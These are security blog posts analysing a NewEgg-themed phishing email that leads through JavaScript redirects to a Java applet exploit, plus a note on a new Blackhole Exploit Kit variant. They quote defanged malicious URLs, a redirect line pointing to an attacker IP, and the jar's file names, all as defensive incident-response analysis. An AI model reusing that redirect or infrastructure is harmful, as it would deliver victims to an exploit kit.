NewEgg Phishing Scam leads to Java-based exploit?

If you haven't heard yet, there is a phishing email going around masquerading as a NewEgg payment verification.

(Sanitized image from Outlook with no images loaded)

Not surprisingly, the links all point to an initial URL: hxxp://ftp[dot]qsari[dot]org/YtWvZiiG/index.html, which contains references to 3 JavaScript files (I assume for redundancy; URLs altered to prevent clicking):

hxxp://congress-assistants[dot]fi/idm2TZP1/js.js
hxxp://mobileproductivemoneymaking[dot]com/oExXoVCh/js.js
hxxp://primasaleorganik[dot]com/3N6zKxSS/js.js

All of these files contain JavaScript pointing to the same location (URLs altered to prevent clicking):

document.location='hxxp://216[dot]224[dot]182[dot]94/showthread.php?t=d7ad916d1c0396ff';

This points to the final page, containing a Java applet.  The file path is obfuscated, partially by hex entities. It loads with parameters:

hxxp://216[dot]224[do]182[dot]94/data/Klot.jar?a=1

It passes a "code" param, code="ta.tc".  The archive contains 3 files:

ta/ta.class
ta/tb.class
ta/tc.class

At this point, we all know this is surely a Java exploit... Blackhole exploit kit comes to mind.  Here are the VirusTotal results (you will see my initial analysis there, which is contained in this blog post):

https://www.virustotal.com/file/49fd75119fdb50902e7e265b0243cc793eb4d9bd4675271e1853a04e194a3e18/analysis/

As any good malware used in a phishing campaign should, this file receives a  not-so-shocking 0/42.  I wonder how many users clicked this?  Luckily, the individuals who received this did not do so.  Instead, they forwarded it to me for advice.  Whew!

Coming up, I'll attempt to dig into analyzing the decompiled Java code...

Greetings to sympt0m

My friend David Keaton, aka sympt0m has created a blog.  I'm excited to see what he has to say. I'm ready to absorb that reverse engineering knowledge you have, buddy.  Let it fly!

Blackhole Exploit Kit (Part 1)

If you are involved in any type of incident response for your organization, you've most likely heard about the Blackhole Exploit kit. This threat, seemingly of eastern European origin, has been making its rounds over the last year. Recently, I have been observing an increase in activity related to the Blackhole exploit kit. So far, the delivery methods that I have observed involve dropping a .jar file and .class files on the target system.  Today, I observed something a bit different.

Take a look at the following analysis report from VirusTotal:

https://www.virustotal.com/file/19d0218d21f8f3d30bbf0dbd6a487d8ae4d86b696c678c33eb5b5042ef6f3e3e/analysis/

The file scores a 0/42.  This is not the first time, nor will it be the last time that this situation occurs. Perhaps this is the newest variant and I happened to catch it during an initial release. One thing that does concern me is that this threat appears to be different from the previous version I observed just a week ago.  I'd be interested to hear observations from anyone else who is actively tracking this threat.

Emerging threats like these are the reason why human involvement is still key in incident response and analysis of suspicious activity.  The BHEK seems to be implementing a high amount of obfuscation in order to avoid signature-based detection.  While this is neither surprising or new, it does seems to show that these guys are more than one step ahead of the current defense systems we all employ.  I am hoping to test out the dynamic aspects later today to see what is revealed.

More to come...